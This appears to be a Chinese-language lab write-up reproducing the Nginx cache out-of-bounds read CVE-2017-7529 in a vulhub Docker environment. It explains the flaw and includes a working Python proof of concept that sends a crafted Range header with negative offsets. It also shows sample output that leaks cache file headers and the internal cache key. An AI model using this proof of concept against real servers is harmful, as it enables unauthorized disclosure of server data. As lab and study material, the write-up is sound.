Nginx 越界读取缓存漏洞 CVE-2017-7529
漏洞描述
Nginx
在反向代理站点的时候,通常会缓存一些文件,特别是静态文件。缓存的部分存储在文件中,每个缓存文件包括文件头
+HTTP返回包头
+HTTP返回包体
。如果二次请求命中该缓存文件,Nginx
会直接将该文件中的HTTP返回包体
返回给用户。
如果我的请求中包含Range
头,Nginx
将会根据我指定的start
和end
位置,返回指定长度的内容。而如果我构造了两个负的位置,如(-600, -9223372036854774591),将可能读取到负位置的数据。如果这次请求又命中了缓存文件,则可能读取到缓存文件中位于HTTP返回包体
前的文件头
、HTTP返回包头
等内容。
影响版本
Nginx 0.5.6 ~ 1.13.2
复现思路
漏洞复现
环境搭建:
git clone https://github.com/vulhub/vulhub.git
cd vulhub/nginx/CVE-2017-7529
docker-compose up -d
访问:http://<ip>:8080
正常即可。
POC
已经在当前目录中给出来,文件名poc.py
:
#!/usr/bin/env python
import sys
import requests
if len(sys.argv) < 2:
print("%s url" % (sys.argv[0]))
print("eg: python %s http://your-ip:8080/" % (sys.argv[0]))
sys.exit()
headers = {
'User-Agent': "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"
}
offset = 605
url = sys.argv[1]
file_len = len(requests.get(url, headers=headers).content)
n = file_len + offset
headers['Range'] = "bytes=-%d,-%d" % (
n, 0x8000000000000000 - n)
r = requests.get(url, headers=headers)
使用POC
进行验证:
python3 poc.py http://<ip>:8080/
# 获取到的文件头及返回包头
--00000000000000000019
Content-Type: text/html; charset=utf-8
Content-Range: bytes -605-611/612
’‰Ô`b`RY:‡Ô`r«\me"59526062-264"
KEY: http://127.0.0.1:8081/
文章许可:本文采用CC BY-NC-SA 4.0许可协议,转载请注明出处。